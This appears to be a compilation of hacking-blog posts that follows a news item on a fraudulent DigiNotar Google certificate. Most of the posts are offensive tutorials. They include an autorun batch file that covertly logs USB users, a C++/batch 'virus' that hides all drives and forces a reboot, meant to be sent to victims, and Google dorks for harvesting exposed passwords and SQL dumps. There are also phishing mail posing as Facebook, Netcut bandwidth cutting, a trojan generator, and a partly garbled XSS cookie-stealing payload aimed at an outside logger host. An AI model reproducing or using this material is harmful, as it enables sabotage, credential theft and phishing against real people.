Hackers has obtain Google certificate, could hijack Gmail accounts

Hackers have obtained a digital certificate good for any Google website from a Dutch certificate provider, a security researcher said.

Criminals could use the certificate to conduct "man-in-the-middle" attacks targeting users of Gmail, Google's search engine or any other service operated by the Mountain View, Calif. company.

"This is a wildcard for any of the Google domains," said Roel Schouwenberg, senior malware researcher with Kaspersky Lab, in an email interview Monday.

"[Attackers] could poison DNS, present their site with the fake cert and bingo, they have the user's credentials," said Andrew Storms, director of security operations at nCircle Security.

Man-in-the-middle attacks could also be launched via spam messages with links leading to a site posing as, say, the real Gmail. If recipients surfed to that link, their account login username and password could be hijacked.

Details of the certificate were posted on Pastebin.com last Saturday. Pastebin.com is a public site where developers -- including hackers -- often post source code samples.

According to Schouwenberg, the SSL (secure socket layer) certificate is valid, and was issued by DigiNotar, a Dutch certificate authority, or CA. DigiNotar was acquired earlier this year by Chicago-based Vasco, which bills itself on its site as "a world leader in strong authentication."

Vasco did not reply to a request for comment.

Security researcher and Tor developer Jacob Applebaum confirmed that the certificate was valid in an email answer to Computerworld questions, as did noted SSL researcher Moxie Marlinspike on Twitter. "Yep, just verified the signature, that pastebin *.google.com certificate is real," said Marlinspike.

Because the certificate is valid, a browser would not display a warning message if its user went to a website signed with the certificate.

It's unclear whether the certificate was obtained because of a lack of oversight by DigiNotar or through a breach of the company's certificate issuing website.

Schouwenberg urged the company to provide more information as soon as possible.

"Given their ties to the government and financial sectors it's extremely important we find out the scope of the breach as quickly as possible," Schouwenberg said. The situation was reminiscent of a breach last March, when a hacker obtained certificates for some of the Web's biggest sites, including Google and Gmail, Microsoft, Skype and Yahoo.

Then, Comodo said that nine certificates had been fraudulently issued after attackers used an account assigned to a company partner in southern Europe.

Initially, Comodo argued that Iran's government may have been involved in the theft. Days later, however, a solo Iranian hacker claimed responsibility for stealing the SSL certificates.

Kaspersky's Schouwenberg said "nation-state involvement is the most plausible explanation" for the acquisition of the DigiNotar-issued certificate.

"For one [thing], there's the type of information being looked for -- from Google users," said Schouwenberg. "This hints towards an intelligence operation rather than anything else. Secondly, this type of attack only works when the attacker has some control over the network, but not over the actual machine."

Others were more skeptical because of the claim that a single hacker pulled off the Comodo heist.

"I think it might still be a stretch to attribute this to the Iranian government," said Marlinspike on Twitter shortly before 4 p.m. ET. "We all know how that went last time."

The google.com certificate has not yet been revoked by DigiNotar -- the first step to blocking its use -- even though it was issued July 10.

Last March, browser makers, including Google, Microsoft and Mozilla, rushed out updates that added the stolen Comodo certificates to their applications' blacklists.

Storms said he expected Google to quickly update Chrome, and that Microsoft, Mozilla and other would do the same some time later. "I suspect that if asked [Microsoft and Mozilla] will also issue updates, as there is already a precedent," said Storms.

HOW TO TRACE INVISIBLE USERS ON GTALK

Tracing Gtalk users is rather easy,you only have to use the following method -

1. Login to Gtalk using your Google id.
2. Go to IM window of user you want to trace for invisible.
3. You will see a drop-down list on right top side,click on it.
4. Click on "go off the record".
5. Now give any message.
6. If the "ABC@gmail.com is offline and can't receive messages right now" message appears in red color it means your friend is really offline.
7. If no message comes means your friend is online and invisible for all.

Track USB drive users

I got an interesting email from my friend who asked me that how he can track users who used his USB drive after he has given it to someone. He wanted to get the usernames of the accounts where the pendrive was used. I thought for a while and told him that he can achieve this feat either by using Trojans or a combination of Batch and Autorun files. However,you must advise users to not to format the pendrive in order for this to work.The second option of Batch files was easy and less suspicious.So Here is how I made it possible to get the usernames when the pendrive was plugged into the PC -

Create an autorun.inf file on the root of your flash drive/Pendrive with the following contents:

[autorun]
open=username.bat
action=Open folder to view files

Now, create a batch file called username.bat with the following contents:

@echo off
echo %username%>>users.dat
date /t>>users.dat
time /t>>users.dat
start "Explorer" %SystemRoot%\explorer.exe

 

NOTE : The Last Line of the code is optional which will open the explorer in a new window.

Save both file and you are good to go. Now whenever a user plugs your pendrive into their PC,it will display an autoplay option indicating that they have to click on the icon to open the drive to view its contents. A small DOS window will flash for a moment and then disappear.Now If you go into the root of the drive, you will find a new file called users.dat which will record the user names of all the users who have accessed your drive by clicking on the icon. You can open the DAT file using notepad and view its contents.

However..This is not a fool proof method as some geeks disable the autoplay option (or disable writing to USB drives) ,or they just bypass it by pressing RISHT SHIFT key when the pendrive is connected and hence their name will not be recorded or they can delete the users.dat file. But that said,it will work fine nevertheless :)

NOTE 2 : Umm..I think the above code is way too easy and harmless,why not to get creative and create a batch file which will even change the password ?(DOS NET commands) or even wipe out system32 of your nemesis (cacls command) ?

Keep Learning friends..I mean it :P

John the Ripper – Password cracking at its best

If you are into password cracking then you probably know about it,John the Ripper is one of the most popular password testing and breaking program available. JTR, as its fondly called ,combines multiple password cracking packages into one package,includes auto detection of hashes and is a fast password cracker. It is currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS and supports 15 different platforms . Its primary purpose is to detect weak Unix passwords ( no..I m kidding,Its primary purpose is to break passwords :P ).It can natively detect and crack various encrypted password formats including several crypt password hash types most commonly found on various Unix flavors (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. JTR has an active community and multiple third party patches have been added to increase its functionality to include MD4-based password hashes and passwords stored in LDAP, MySQL and others unsupported hashes. JTR is the penultimate when it comes to password cracking in windows (Cain and Abel is the ultimate :P), but for Linux and open source,its the best you can get your hands on.Fire it up with a wordlist and you are good to go

Here is a sample output of JTR in Debian environment (shamelessly taken from Wikipedia)

root@0[john-1.6.37]# cat wpass.txt
user:AZl.zWwxIh15Q
root@0[john-1.6.37]# john -w:password.lst wpass.txt
Loaded 1 password hash (Traditional DES [24/32 4K])
example         (user)

guesses: 1  time: 0:00:00:00 100%  c/s: 752  trying: 12345 - pookie

You can download JTR from here

Advanced password hacking using Google – easy to learn, easy to apply

Google is your best friend when it comes to hacking. The search engine giant has crawled loads of data which was intended to be protected by webmasters, but is being exploited and mined by smart users using Google dorks. Today I will be discussing some practical dorks which will help you gain passwords, databases and vulnerable directories. The basic methodology remains the same, query Google using specialized dorks with precise parameters and you are good to go. I assume you have basic working knowledge of google dorks.

Lets start, shall we ?

FTP passwords

ws_ftp.ini is a configuration file for a popular win32 FTP client that stores usernames, (weakly) encoded passwords, sites and directories that the user can store for later reference.

intitle:index.of ws_ftp.ini

You can also this dork which uses "parent directory" to avoid results other than directory listings

filetype:ini ws_ftp pwd
Or
"index of/" "ws_ftp.ini" "parent directory"

even if the site or file has been taken offlline, you can still search the contents in the Google cache using the following dork

"cache:www.abc.com/ws_ftp.ini"
where
http://www.abc.com/ is the site you want to check the dork for.

The ws_ftp password uses quite weak encryption algorithm, hence once you get the password, you can break it using the decryptor provided here or from here.

PHP Hacking

Sites made in PHP have a file known as “config.php” which stores configuration and the username and password for the sql database the site is hosting. This password is required only once per transaction (i.e when ever admin logins or a transaction is committed at administrator level) and hence will be specified by the ‘require_once’ parameter in the config file or in index file.

intitle:index.of config.php

to view php file contents

intitle:"Index of" phpinfo.php

you can also try the directory traversal attack in php using the following dork

inurl:download.php?=filename

if you are lucky, substitute the filename with ‘index.php’, download it, read it and get the password (hint:if you are not able to find it, try looking for globals.php).

Since most websites today deny this trick, but you may get lucky with some :)

SQL Dumps

We will be hunting for SQL password dumps saved in database, here ext:sql specifies the type of password dump, e10adc3949ba59abbe56e057f20f883e is the md5 hash for 123456; one of the most common password people keep..and intext dork will allows to search inside the dump.

ext:sql intext:@gmail.com intext:e10adc3949ba59abbe56e057f20f883e

ext:sql intext:"INSERT INTO" intext:@somemail.com intext:password

Remember kids

1. Use different email providers, substitute gmail/yahoomail instead of somemail ,or try custom domain mail providers.
2. Use different file extensions.
3. Use different type of hashes, some older ones might be using md4 and some others might be using other prominent encryption algorithms.
4. just mix everything up and try different combinations :)

Its not over..Yet
A very flexible query can be used to hunt for WS_FTP.log which in turn can disclose valuable information about the server.

+htpasswd +WS_FTP.LOG filetype:log

You can substitute "+htpasswd" for "+FILENAME" & you may get several results not mentioned before using the normal search. You can further explore filenames by using keywords like

phpinfo, admin, MySQL, password, htdocs, root, Cisco, Oracle, IIS, resume, inc, sql, users, mdb, frontpage, CMS, backend, https, editor, intranet

The list goes on and on.. Also you cam try this dork to data mine information about the uploader

"allinurl: "some.host.com" WS_FTP.LOG filetype:log"

which tells you more about who's uploading files to a specific site, quite handy for some passive reconnaissance.

Also..if you are one hell of a lazy b**tard ,you can do it using some software like Google Hacks..but remember, manual way is the way to go. I may have included some software specific password mining, but that would cripple your imagination. My recco ? go postal by using your imagination and developing your own dorks and queries.

I guess that was enough for this time, will be coming with more tuts with time.

How to use Google to find .edu, .gov and CommentLuv backlinks

You know it, in order to rank high in search engine results pages, you have to get strong backlinks to your blog.

Today, I got even better than a list: I’ll show you a technique to find .edu, and .gov site as well as blog with the CommentLuv plugin enabled, using the power of Google.

Please use the techniques shown this post reasonably and don’t spam any sites. Spam is not an efficient SEO technique and is penalized by Google.

Commenting guidelines

 

[tweet]Before showing you the techniques, I’d like to insist on the fact that you that you should never spam blogs or forums. Serious and/or popular sites never spam, and there’s no benefit to do it so.
In order to get a real traffic and seo benefit from the sites you’re going to find, always post relevant comments and use your real name, not a keyword. Also, don’t paste links in the comment text.

Finding .edu or .gov blogs using Google

In order to find .edu or .gov blogs using Google, you simply have to use Google search box and a few special parameters.
Let’s give it a try. Paste the following code in Google.com search box:

site:.edu inurl:blog "post a comment"

Google just returned you thousands of results: sites which have .edu and blog in their url, as well as “post a comment” in the page. easy, isn’t it?
Finding .gov blogs is extremely easy as well. The only thing you have to do is to change the extension in the query:

site:.gov inurl:blog "post a comment"

Using the inurl parameter, you can find lots of things, such as wikis. Though, be warned that modifying wikis for promotional or SEO purposes is not a good thing and that it may produce more harm than good.

site:.edu inurl:wiki

How to find blogs with CommentLuv

CommentLuv is a free WordPress plugin which automatically create a link (generally dofollow) to the commenter last post. Of course, leaving a comment on a CommentLuv enabled blog is good for your SEO.

But now, how to find blogs with CommentLuv? Just use the following query and enjoy Google results. The text within quotes is the text that must be contained in the page, and “blogging tips” are just keywords related to what you’re looking for.

"Enable CommentLuv" blogging tips

Finding blog with the “Top Commenters” widget

Top Commenters is another free WordPress plugin which reward top commenters with a link, generally in the blog sidebar. It used to be very popular but seems its popularity decreased. Anyways, using Google it is still pretty easy to find some blogs with this widget enabled:

"Top Commenters" make money

Good luck in your backlink search, and please remember to stay reasonable.

How to compress 1 Gb data to 10 mb

Many times our hard disk runs out of space and we have to delete some data or the other for no reason. Even I used to face the problem sometime back in history and by doing some research on the topic, I actually found a working and an awesome way to save my hard disk space.

How effective is it?

Well by this method I converted NFS UNDERGROUND 2 which is somewhat around 2 Gb tb 21 Mb. And same is the case with everything important I wanted to save.

How did I do it?

You are just about to know… Read on.

I used a software named KGB Archiver.

About KGB archiver:  KGB Archiver , an open source compression tool like 7zip and UHARC with an unbelievably high compression rate .It uses AES-256 encryption (one of the strongest encryption known for man) to encrypt archives . The disappointing thing with KGB Archiver is due to its high compression rate its minimum hardware requirement is high ( recommend processor with 1,5GHz clock and 256MB of RAM ) and compression and decompression process is time consuming.

Its strength: Very high compression power with very accurate results and no loss of data.

Its weeknss: Due to high compression , the time required to compress and decompress the file is high. High system requirement

From where can you download this software.?

 Just click on the link given to Download KGB archiver for free.

Click Here to Download KGB Archiver for free.

5 Things Every Beginner Hacker Should Know

Hey guyz, today at http://hacking-information.blogspot.com/ we are going to discuss “5 Most Common Mistakes Done by Beginners in the field of Hacking“ or we can say “5 things Every New Beginner Hacker Should Know”.

This post is for everyone out there who actually want to become a true hacker:-

1) Never trust sites that ask you for money in return of Hacking Softwares or who claim to Hack Email Id’s in return of money. All such things are Scam . Nothing Works.


2) There is NO DIRECT SOFTWARE to Hack Facebook , Google , Yahoo or any other big website. All the softwares that claim to do so are scam. They are just meant to take your money and in worse cases, those softwares have trojans or keyloggers in them. As a result your account gets hacked trying to hack others.

3) NEVER EVER use the keyloggers or trojans you find as freeware on internet. Hackers are not fools. They compile keyloggers and trojans almost with any such software and when you install them , you are already hacked before even trying to hack others.

4) You are never going to be a good hacker without the knowledge of programming and scripting languages. When you are going to use only ready made softwares and would depend on them for hacking anything then your functionality would be limited upto the functionality of the software. When you are not going to use your brain , just doing the copy paste thing, then how can you even think of being a good hacker.

5) If you are a good Hacker, you already become a good programmer , a good script writer , a good web developer and an excellent security expert. Well any good Hacker will/should have good knowledge of various aspects and programming languages. to do XSS (Cross Site Scripting ) , PHP INJECTION , SQL INJECTION , PHISHING , FOOTPRINTING etc… you will have to be good at programing and scripting. And when you know the Various loop holes , vulnerabilities and security tips, you already become a Computer Security Expert.

So Never Ever Under estimate the term Hacker. A Hacker Is Not a person who just hacks email id’s or servers but a True Hacker is a Computer Genius who the knowledge of computers more than anyone.

Next time think before asking the question – “How much Will I get in this field?” because, if you have so many skills , you really don’t have to run after money. Success comes and money follows itself.

What is l33t or Language Used By Hackers

Hey Guys , today I want to tell you something from the Hackers World. This is something not everyone is aware of. Today I am going to tell you about l33t.

Do you know what is “leet” or “l33t”?

Any idea?

Just read on..

According to Wikipedia:- Leet (or “1337″), also known as eleet or leetspeak, is an alternative alphabet for the English language that is used primarily on the Internet. It uses various combinations of ASCII characters to replace Latinate letters. For example, leet spellings of the word leet include 1337 and l33t; eleet may be spelled 31337 or 3l33t.

Hackers communicate between themselves in a language which is a combination of alphabets, numbers and symbols etc… This 1337 is very famous in the hacking and internet world. We can say that it is the language used by hackers.

GOOGLE PAGE OF 1337 OR LEET

The reason I am writing this post is that I found a dedicated page on Google on “1337″ or “leet”. I am giving you guys the link to it.. Just follow the link below

http://www.google.com/webhp?hl=xx-hacker

How to Learn Leet or 1337

If you want to learn the Hacker’s Language ie.. Leet then just follow this table on Wikipedia. It has the complete reference guide for it.
http://en.wikipedia.org/wiki/Leet

Leet Converter

I am also providing you with a link to Leet converter. You just have to type your text in English and the converter will itself convert the text into leet for you. You can also control the extent of leet you want. To learn more, just visit and check yourself. Click on the link below to visit the page

http://www.albinoblacksheep.com/text/leet

Though there are many converters online, but I found this one to be the best one.

So, how many of you actually knew that..:P

Anyways thats all for today.

I hope you liked it.

5 Ways to Check if you are Hacked

In this post I am going to tell You 5 ways in which you can check if you are hacked.

Just follow along and check all the steps, you might also be one of the victims.

NOTE:- Before doing these steps, close all the downloads and web pages. Make sure on torrent of window update install is going on but stay connected to internet.

1) The first method is very simple for all the people using an ADSL router. After all the internet downloads are closed, just check the status of Ethernet light. It should not blink at a very fast rate. It shows that packets are being transferred in and out of your computer.
But as there is no active download or internet activity so no packets should transfer. If so… you might be hacked

2) goto run and type cmd. The command prompt will open. In the command prompt type

netstat -a

This shows the list of active internet connections, check if any unnecessary internet connection is ESTABLISHED. If so, you might be hacked if you type just netstat, you will get the list of all the netstat commands, you may try the other commands as well.

3) You notice any abnormal activity in your computer, like your computer hangs for a couple of seconds every time you switch it on or in between your tasks (if it occurs often), there is a chance that you are hacked. Often keyloggers and trojans are configured to deliver all the log information to the destination ip address/ ftp address after reqular interval of time. And when this information is being sent, the browser hangs for some time.

4) Use softwares like TCP view, it gives the list of all the connections made through TCP. This software is capable of detecting almost all the trojan/malicious connections.

5) Keep the antivirus updated and install an external firewall like comodo. If your antivirus is not updated regularly, it is as good as nothing. If you don’t update your antivirus reqularly and often exchange data from other computers and download a lot of files. There is a great possibility that you are hacked.

Beware!! Stay updated, stay Protected.

 

Hacking Autorun.inf virus attack|Is autorun.inf virus?

When i  studied second year(cse), my friends told that autorun.inf is virus.  I thought so.  Because my antivirus blocks autorun.inf files.   In third year when i search about autorun.inf file in net, i realize about the auto run file.



 Today i bring some files from my college system.  When i insert the pen drive in my system, there are lot of exe files.They are viruses.  I delete all of them.  Finally i opened the autorun.inf file in notepad and saw the instructions.  Then only i remembered that i forget to post about autorun file.  This article will give you complete details about the autorun.inf file.

This is the instructions that saved in the infected(call virus programs) autorun.inf file:

[Autorun]
Open=RECYCLER\QqFvXcB.exe
Explore=RECYCLER\QqFvXcB.exe
AutoPlay=RECYCLER\QqFvXcB.exe
shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe

is autorun.inf virus file?  no.  Then why antivirus block the autorun.inf files?  Go ahead to know the full details about auto run file.

Introduction to Autorun.inf File:

Auto run is file that triggers other programs,documents ,other files to be opened when the cd or pen drives are inserted.  Simpy triggers.


When cd or pen drives are inserted, windows will search for the autorun.inf file and follow the instructions of autorun.inf file(instructions have written inside the autorun.inf file).

How to create Autorun file?

Open notepad
type this command:

[Autorun]

save the file as "autorun.inf" (select all files, not text )

Complete Syntax and instructions inside the Autorun file:

Basic syntax must be inside  the autorun.inf file is :

[Autorun]

This will be used to identify the the file as autorun.

OPEN=

This will specify which application should be opened when the cd or pen drive is opened

Example:

open=virus.exe

This will launch the virus.exe file when cd or pen drive is opened.  The file should be in root directory.

if the file is in any other sub directories ,then we have to specify it.

Open=RECYCLER\Virus.exe

Explore=

Nothing big difference. if you right click and select explore option in cd or pen drive.  This command will be run.

AutoPlay=

Same as the above , but it will launch the the program when auto played.

SHELL\VERB =

The SHELL\VERB command adds a custom command to the drive's shortcut menu. This custom command can for example be used to launch an application on the CD/DVD.

Example:

shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe

Use a series of shell commands to specify one or more entries in the pop-up menu that appears when the user right-clicks on the CD icon. (The shell entries supplement the open command.)

Icon=

Change the icon of your pen drive or cd.  you can use .ico,.bmp images(also .exe,.dll)

Example:

icon=breakthesecurity.ico

Label=

Specifies a text label to displayed for this CD in Explorer

Note that using the LABEL option can lead to problems displaying the selected ICON under Windows XP.

Example:

Label=Ethical hacking

Why Antivirus Block Autorun.inf file?

From above ,you come to know that autorun.inf file is not virus.  But why antivirus blocks it?  Because as i told autorun file call or launch any application or exe files.  It will lead to virus attack.  If the autorun.inf is blocked,then there is no way to launch the virus code.

Autorun is not virus but it can call virus files.

C++ ,Batch Virus code to disable All Hard disk

Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.

C++ Virus Code :

#include < windows.h >

#include < fstream.h >

#include < iostream.h >

#include < string.h >

#include < conio.h >

int main()

{

ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/



write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }

Copy the above code and paste in notepad

Save the file with .cpp extension

Compile and create .exe file in cpp

Note:

Don't run this c++ program ,it will attack your system itself.

Copy the created .exe file and send it to your victim. You can also attach it with any other

exe files.


Batch Virus Code Creation:

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by us!\" -f

I think this code will simple for non c++ programmers. It is easy to create the batch file also.

Copy the above code to notepad.

Save it with .bat extension (for ex: nodrivevirus.bat)

Send the file to your victim

How to send Anonymous Mail to anyone|Set up your own server

Everyone Like to send Anonymous Mail to your enemy or friend or teacher.  Here is the Hacking tutorial for you to implement that.  So i hope This will be best hack for you.




What is the Use?

I explained you in my older post how to get ip address.  To get the ip address you need to send the mail with link.  So You can send mail to your victim with that link such that you are contacting from an organization.



For Eg:

You can say we are from Facbook,we have new feature to enable the feature visit this page.

How to do?

Step 1:

First of all you need to register in free web hosting service which has PHP feature.  So my choice is

x10hosting.com

Step 2:

Now Download this zip file:

             Mail.php

Inside the file you can find the mail.php file. Extract the file



Step 3:

Now Go to x10hosting.com and login with your username and password.

Upload the "mail.php" file to "public_html" folder.



Step 4:

That's all you finished.

Now go to this page

         yourhosturl/mail.php

Change the yourhosturl with your website url which you gave it when you register in x10hosting.com

For eg:

yourfavorites.x10.mx/mail.php



Usually the default will be "name.x10.mx"



When you visit you will see the form just like this:

Fill the form with your victim mail address and message subject and send

     Don't give your details in the sender field.

Just fill with any organization name.

For Eg:

BestSurveyProviders

Bandwidth Stealer For Fast Browsing

If you are in your school's computer lab or in home , this software will always help you in your work . It is common thing to have many computer's connected with one device for internet and it causes your bandwidth to fall down . Here I am introducing a software called netcut which cuts the one's connection in such a crucial condition as I stated, I am stating it as crucial as really it’s a headache causing problem for me I hate slow surfing.When it cuts the one's connection , it automatically increases bandwidth of your connection which will let you work more easily and fastly.

Download Netcut here for Free:-

You can download this bandwidth stealing software named as Netcut from below:-
Download Netcut
Using Netcut :-
1: Download net cut.
2: Extract the software and install it.
3: Now open netcut software and a window will pop-out showing you connected routers.
4:  Just toggle to the computer which you want to cut off like this photo:

5: And that's it.Now you are free to eat up every last bit of bandwidth. Enjoy

Find Any Facebook Profile By using Picture

Today I,ll discuss a short and smart trick using which you can easily locate any Facebook profile within seconds but the thing which matters is this that the picture must have the unique name in which the address of the person’s pofile is hidden however it may help you some day that’s why I am sharing this trick. First of the go to the picture and see its name with which its been saved anywhere, It must be in some numerical figures having a “_n” in the end.
Lets, Take a picture and inspect its name, so we found the following name of the picture:

23213_100000967034368_1371_n

Now, We have to find profile address out of it, Just ignore the 23213 in the start and also 1371_n in the end, Just copy the mid snippet of numbers like 100000967034368 , And after this paste it in notepad.
Now, Take this URL:

http://www.facebook.com/profile.php?id=

And paste the snippet of numbers which you have pasted in notepad just after it like this:

http://www.facebook.com/profile.php?id=100000967034368

Copy this whole URL and Paste this in browser address bar and hit enter, After this you,ll see the person’s, whose pic was here only, Facebook profile in front of you. Small trick but useful one in some cases.

Ten SQL Injection Scanners

A large number of website get hacked due to sql vulnerabilities. And probably hackers are using such techniques to deface websites on country, cast and religion reasons too. Security is basically from you and you are responsible for your website. If you will leave a hole and won't patch it then hacker will gain access to your admin panel and will upload a shell to deface the website. Well, Having a backup of website is good thing but as a result of defacement the site will be down for a long time and this will take down your traffic rank also. The purpose of HT is to produce awareness among you therefore i am posting some good SQL scanners here. Which are automated and will scan for vulnerability at one click. This is actually auditing your own website. Look at the list:

1) Automagic SQL Injector

The Automagic SQL Injector is part of the Sec-1 Exploit Arsenal provided as part of the Applied Hacking & Intrusion Prevention training courses.



In a nutshell it's an automated SQL injection tool designed to help save time on pen tests. It is only designed to work with vanilla Microsoft SQL injection holes where errors are returned.



The following features are currently supported:



 * Browse tables and dump table data to a CSV file (2 methods).

 * Upload files using debug script method.

 * Automagical UDP reverse shell

 * Interactive xp_cmdshell (simulated cmd.exe shell)



For a demonstration please visit this

To download the tool: Get here





2) SQLNinja

SQLNinja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end database.Sqlninja is written in Perl and should run on any UNIX based platform with a Perl interpreter, as long as all needed modules have been installed.

To download the tool : Get Here



3) FJ-Injector Framwork

FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications and servers. Its features are a proxy for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation.

To download the tool : Get Here



4) SQL Power Injector

SQL Power Injection helps the penetration tester to inject SQL commands on a web page. It’s main strength is its capacity to automate tedious blind SQL injection with several threads

To download the tool : Get Here



5)Blind SQL Injection Perl Tool

bsqlbf.pl is a Perl script that allows users to retrieve information from web sites that are vulnerable to SQL Injection.

To download the tool: Get Here



6) SQL Injection Digger

SQL injection digger is a command line program that looks for SQL injections and common errors presnt in websites. This version now can perform the following operations.

 * Look for SQL injections and common errors in website urls found by performing a google search

 * Look for SQL injections and common erros in a given url or a file with urls

 * Look for SQL injections and common errors in links from a web page

 * Crawl a website/webpage and do the above

To download the tool: Get Here



7) Absinthe-Blind SQL Injection Tool

Absinthe is a GUI-based (GTK-Sharp) tool that automates the process of downloading the schema & contents of a database that is vulnerable to Blind SQL Injection.Its features are:

* Automated SQL Injection

 * Supports MS SQL Server, MSDE, Oracle, Postgres

 * Cookies / Additional HTTP Headers

 * Query Termination

 * Additional text appended to queries

 * Supports Use of Proxies / Proxy Rotation

 * Multiple filters for page profiling

 * Custom Delimiters

To download the tool: Get Here 



8) SQL Map

Sqlmap is an automatic blind SQL injection tool capable to enumerate entire remote database, perform an active database fingerprint and much more. The aim of this project is to implement a fully functional database mapper tool which takes advantages of web application security flaws.

To download the tool: Get Here



9) BobCat - SQL injection Exploitation Tool

BobCat is a MS Windows based tool to aid a security consultant in taking full advantage of SQL injection vulnerabilities. It is based on a tool named "Data Thief" that was published as PoC by appsecinc. BobCat can exploit SQL injection bugs/opportunities in web applications, independent of language, but dependent on MS SQL as the back end DB.

To download the tool: Get Here



10) SQLibf- SQL Injection Brute Forcer

SQLibf is a SQL Injection Brute-forcer tool for automatizing the work of detecting and exploiting SQL Injection vulnerabilities. This is not an easy or standalone application. It must be used by a web application auditor for helping and complementing his findings. SQLibf can work with both Visible and Blind SQL Injection vulnerabilities. It works by doing simple logic SQL operations to determine the level of exposure of the vulnerable application.

To download the tool: Get Here

Trojan horse Generator (Easiest Way)

Today, i am going to teach you how to creat your own trojan virus with a software,it's too much easy,like a plain sailing and everyone can understand it.Read my short guide and enjoy having fun with your own trojan

THING WHICH YOU NEED IS:



>:Getbatch trojan generator . downlod here

METHOD:

1: Download trojan generator and open it .

2: A window will pop out like this one:

and type "1" to make trojan and "2" to exit.

3:Now software will ask about the type of trojan you want to make,so fill each blank according to your desire like this

4:Now it will promt many options like below enter "y" for yes "n" For no:

After filling all the blanks it will make a file in an unknown place with the name TROJAN.

5:Now go to search column of your windows and search for "trojan".Your window will show you results with the name of trojan,find a batch file in them with name of trojan.bat which is your own trojan virus.

Enjoy,

To put this trojan in startup and to play more read the post below by Ali Raza:

Virus Making With TextPad

File Sharing on windowsXP SP3(awesome feature)

This post is about windowsXP SP3 exclusive feature.If you have WLAN connection then it may be a very informative and helpful post for you,if you have broadband or something which include wire connection then it might not help you.This post will tell you how to upload files on internet from your pc docs.

METHOD:

Suppose you want to share *my pictures* folder,simply open *my documents* and right click on folder icon labelled *my pictures*.Whithin the context menu,click on the *sharing and security*

menu item.This will open the properties box for that folder.In the sharing tab move your mouse pointer to the second frame and click on*network setup wizard*.





This wizard guides you through differebt steps,and you may choose to stick with default options in each step.Once the wizard completes hit *finish* button and your computer will be ready to share the folder and it's contents on your WLAN.



Back in the *sharing* tab of the *properties* dialog,check the options labelled *share this folder on the network* and give your shared folder a name.This name will be visible to all users who are allowed to access the folder over the network.If you don't want contents of the folder to be changed over net then it gives you option -read only folder-.

Once you are done click finish.To check your folder whether it has been successfully shared on net or not,type*//*in the address bar followed by your computer's name,and press *go*.use the same address that you've just entered in the address bar(//yourpc'sname//) to access this folder from any computer on WLAN.

Enable Telnet in windows 7

I don't use telnet but a friend of mine asked about it to play with some commands. I noticed that in widows 7 its not working, then i came across a short trick to enable it since it not secure thats why windows 7 disabled it also in case of vista but don't worry here is a small way:

1.Start



2.Control Panel



3.Programs And Features



4.Turn Windows features on or off



5.Check Telnet Client



6.Hit OK



Hope it may help you someday!

Cross Site Scripting (Using a hole to Hack with XSS)

Today i will go in detail and will show you that how a XSS hole is used to hack a larger numbers of registered in a website. A short description of this post is here:

1. We find a blog which allows users user to input data.
2. This data is displayed, unedited or sanitised on the blog index page.
3. We want to inject a XSS to log the administrative users cookies.
4. We want to login with the cookie we have stolen. 

Note : This is for educational purpose for designers or for my readers to make there website safe.

What we shall need :

Heres a list of things you will need through-out the tutorial :

Mozilla Firefox (Use an old version not latest).

FF addon : Add & Edit Cookies. 

FF addon : Live HTTP Headers. 

An ACTIVE cookie logger.(Google it yourself i don't want to put it here and to break laws.)

A basic understanding of JavaScript is an advantage, but not essential.(Refer http://www.w3schools.com/ ) 

A XSS vulnerability to test and exploit. Refer to my Old post On XSS. Hosting is up to you, try this free PHP web host , 000webhost etc.

The desire and dedication to learn. [Yourself.]

Identifying & Exploiting the Vulnerability:

Identifying a XSS vulnerability can be pretty straight forward in most cases. A typical method of testing for a XSS vulnerability would be infamous 'Alert' test. Anyone with a basic knowledge of JavaScript will know what this is. This test will make an alert box, or message box, pop up on the screen. This is done by executing the JavaScript function Alert.

<script>alert('hackersthirst.com')</script>

This would display a message box with hackersthirst.com as the message.



To perform this test we want the page in question to print out the script, so the browser will execute it. So in this case using the included vulnerable test page, input the string <script>alert('hackersthirst.com')</script>. Now the page will execute this and you should get an alert box displaying the message 'hackersthirst.com'.



Another method of testing for vulnerability is the document.write method. The same concepts and structure is applied to this method as the alert method, we're just using the document.write function instead of the alert function. So this time we insert :

<script>document.write('hackersthirst.com')</script>

 This time the script will return the string 'hackersthirst.com', (without quotes), and will write it to the page, where the string is supposed to be shown.

Below i am giving a short description on how to exploit this.

Exploiting XSS hole :

After identifying the XSS hole what a hacker will do . Its demonstrated by given example :

(in this example we will be covering cookie stealing), we will go over setting up our logger and a few methods of doing so.



Example 1 :



Our cookie logger URL : http://mysite.com/logger.php Vulnerable Page : http://someblog.com/index.php Injection Point : http://someblog.com/post.php



Now we have all this setup, we can crack on. You can use the following methods to log cookies using JavaScript :

<script>location.href='http://mysite.com/logger.php?cookie=%27+cookiecookielogger.php?cookie='+cookie</script>

